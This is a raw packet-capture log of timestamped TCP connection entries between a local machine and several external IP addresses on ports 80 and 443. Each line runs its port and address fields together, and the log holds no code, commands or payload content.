                                                                                                                            Dec 14, 2024 13:49:31.798146009 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.859858036 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.865705967 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.872184038 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.873223066 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.949194908 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.960175991 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.058079004 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.061131001 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.064471960 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.064737082 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.066979885 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.080054045 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.081830978 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.081908941 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.081911087 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.081968069 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.085035086 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.085254908 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.186927080 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.205651999 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.274912119 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.282720089 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.379173994 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.383274078 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.397691965 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.397888899 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.400563002 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.426906109 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.426965952 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.426975012 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.427022934 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.430037022 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.430114031 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.520787001 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.549830914 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.619098902 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.622930050 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.713179111 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.716465950 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.742230892 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.742368937 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.746129990 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.747059107 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.747185946 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.747208118 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.747270107 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.749919891 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.751446962 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:32.865839005 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.871452093 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.875919104 CET49673443192.168.2.6173.222.162.64
                                                                                                                            Dec 14, 2024 13:49:32.875976086 CET49674443192.168.2.6173.222.162.64
                                                                                                                            Dec 14, 2024 13:49:32.939332962 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:32.942035913 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.058907986 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.061217070 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.061234951 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.061286926 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.061893940 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.063594103 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.064740896 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.064806938 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.064850092 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.064904928 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.071068048 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.073486090 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.174282074 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.176939964 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.183340073 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.204044104 CET49672443192.168.2.6173.222.162.64
                                                                                                                            Dec 14, 2024 13:49:33.238027096 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.257088900 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.257174015 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.257190943 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.257317066 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.260493040 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.263449907 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.296715021 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.383295059 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.383409977 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.383754015 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.387742996 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.387804985 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.449058056 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.452091932 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.508769989 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.575285912 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.578150988 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.682171106 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.685118914 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.704149961 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.704220057 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.704267979 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.704267979 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.707405090 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.767379045 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.767760992 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:33.827148914 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.896348000 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:33.938539982 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:34.019421101 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:34.063440084 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:34.130548954 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:34.172827005 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:35.587007046 CET44349709173.222.162.64192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:35.587481976 CET49709443192.168.2.6173.222.162.64
                                                                                                                            Dec 14, 2024 13:49:36.240159035 CET4971980192.168.2.6158.101.44.242
                                                                                                                            Dec 14, 2024 13:49:36.360052109 CET8049719158.101.44.242192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:36.360152006 CET4971980192.168.2.6158.101.44.242
                                                                                                                            Dec 14, 2024 13:49:36.361257076 CET4971980192.168.2.6158.101.44.242
                                                                                                                            Dec 14, 2024 13:49:36.480954885 CET8049719158.101.44.242192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:37.567213058 CET8049719158.101.44.242192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:37.580169916 CET4971980192.168.2.6158.101.44.242
                                                                                                                            Dec 14, 2024 13:49:37.699861050 CET8049719158.101.44.242192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:37.955250025 CET8049719158.101.44.242192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:38.000946999 CET4971980192.168.2.6158.101.44.242
                                                                                                                            Dec 14, 2024 13:49:38.470520020 CET49720443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:38.470578909 CET44349720172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:38.472322941 CET49720443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:38.479763031 CET49720443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:38.479782104 CET44349720172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:39.696491003 CET44349720172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:39.696573019 CET49720443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:39.718527079 CET49720443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:39.718548059 CET44349720172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:39.718954086 CET44349720172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:39.766567945 CET49720443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:39.897643089 CET49720443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:39.939343929 CET44349720172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:40.226114035 CET44349720172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:40.226190090 CET44349720172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:40.226309061 CET49720443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:40.237399101 CET49720443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:40.240894079 CET4971980192.168.2.6158.101.44.242
                                                                                                                            Dec 14, 2024 13:49:40.360829115 CET8049719158.101.44.242192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:40.614959002 CET8049719158.101.44.242192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:40.617675066 CET49722443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:40.617711067 CET44349722172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:40.617774963 CET49722443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:40.618078947 CET49722443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:40.618094921 CET44349722172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:40.659004927 CET4971980192.168.2.6158.101.44.242
                                                                                                                            Dec 14, 2024 13:49:41.832314968 CET44349722172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:41.835032940 CET49722443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:41.835071087 CET44349722172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:42.279898882 CET44349722172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:42.280056000 CET44349722172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:42.280251026 CET49722443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:42.280714035 CET49722443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:42.294492960 CET4971980192.168.2.6158.101.44.242
                                                                                                                            Dec 14, 2024 13:49:42.414511919 CET8049719158.101.44.242192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:42.414582014 CET4971980192.168.2.6158.101.44.242
                                                                                                                            Dec 14, 2024 13:49:42.438414097 CET4972480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:42.558171988 CET8049724193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:42.558279037 CET4972480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:42.558427095 CET4972480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:42.678157091 CET8049724193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:44.061372995 CET8049724193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:44.062668085 CET49726443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:44.062731028 CET44349726172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:44.062812090 CET49726443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:44.063055992 CET49726443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:44.063071012 CET44349726172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:44.110337019 CET4972480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:44.206047058 CET8049724193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:44.206103086 CET4972480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:45.277117014 CET44349726172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:45.278815985 CET49726443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:45.278846979 CET44349726172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:45.721968889 CET44349726172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:45.722151995 CET44349726172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:45.722220898 CET49726443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:45.722580910 CET49726443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:45.735224009 CET4972880192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:45.855155945 CET8049728193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:45.855256081 CET4972880192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:45.855396032 CET4972880192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:45.975239992 CET8049728193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:47.121812105 CET8049728193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:47.122807980 CET49730443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:47.122909069 CET44349730172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:47.122997046 CET49730443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:47.123197079 CET49730443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:47.123218060 CET44349730172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:47.172830105 CET4972880192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:47.818170071 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:47.938144922 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:47.938242912 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:47.938636065 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:48.058357954 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.338435888 CET44349730172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.349328995 CET49730443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:48.349396944 CET44349730172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.779988050 CET44349730172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.780145884 CET44349730172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.780320883 CET49730443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:48.780764103 CET49730443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:48.796210051 CET4972880192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:48.812772989 CET4973380192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:48.916352034 CET8049728193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.916412115 CET4972880192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:48.932503939 CET8049733193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.932580948 CET4973380192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:48.932734013 CET4973380192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:49.052385092 CET8049733193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:49.209090948 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:49.212517023 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:49.332324982 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:49.619646072 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:49.652528048 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:49.652560949 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:49.652636051 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:49.656516075 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:49.656533003 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:49.672852039 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:50.199438095 CET8049733193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:50.200676918 CET49735443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.200726986 CET44349735172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:50.200953960 CET49735443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.201208115 CET49735443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.201222897 CET44349735172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:50.250962019 CET4973380192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:50.872735023 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:50.872853994 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.874514103 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.874522924 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:50.874914885 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:50.922822952 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.929488897 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.971338034 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.320065975 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.320157051 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.320198059 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.323129892 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.326878071 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:51.421669960 CET44349735172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.431302071 CET49735443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.431339025 CET44349735172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.449059963 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.734481096 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.736869097 CET49736443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.736922979 CET44349736172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.737025976 CET49736443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.737535000 CET49736443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.737552881 CET44349736172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.782215118 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:51.867881060 CET44349735172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.868056059 CET44349735172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.868117094 CET49735443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.868571043 CET49735443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.871908903 CET4973380192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:51.872993946 CET4973780192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:51.992404938 CET8049733193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.992499113 CET4973380192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:51.993309021 CET8049737193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.993376970 CET4973780192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:51.993699074 CET4973780192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:52.113372087 CET8049737193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:52.954085112 CET44349736172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:52.956073999 CET49736443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:52.956091881 CET44349736172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.282005072 CET8049737193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.283919096 CET49739443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:53.283968925 CET44349739172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.284039974 CET49739443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:53.284328938 CET49739443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:53.284348965 CET44349739172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.329077959 CET4973780192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:53.407474995 CET44349736172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.407542944 CET44349736172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.407757998 CET49736443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:53.408233881 CET49736443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:53.412626028 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:53.414522886 CET4974080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:53.532991886 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.533094883 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:53.534338951 CET8049740193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.534426928 CET4974080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:53.534574986 CET4974080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:53.654323101 CET8049740193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.496635914 CET44349739172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.498661995 CET49739443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:54.498703003 CET44349739172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.941438913 CET44349739172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.941520929 CET44349739172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.941605091 CET49739443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:54.942133904 CET49739443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:54.946521997 CET4973780192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:54.947341919 CET4974180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:54.991236925 CET8049740193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.992520094 CET49742443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:54.992589951 CET44349742172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.992682934 CET49742443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:54.992985010 CET49742443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:54.993001938 CET44349742172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:55.032238960 CET4974080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:55.067153931 CET8049737193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:55.067311049 CET4973780192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:55.067909002 CET8049741193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:55.068129063 CET4974180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:55.082681894 CET4974180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:55.202605963 CET8049741193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.219755888 CET44349742172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.222090960 CET49742443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:56.222111940 CET44349742172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.351850033 CET8049741193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.353164911 CET49743443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:56.353195906 CET44349743172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.353272915 CET49743443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:56.353935003 CET49743443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:56.353950024 CET44349743172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.407340050 CET4974180192.168.2.6193.122.6.168
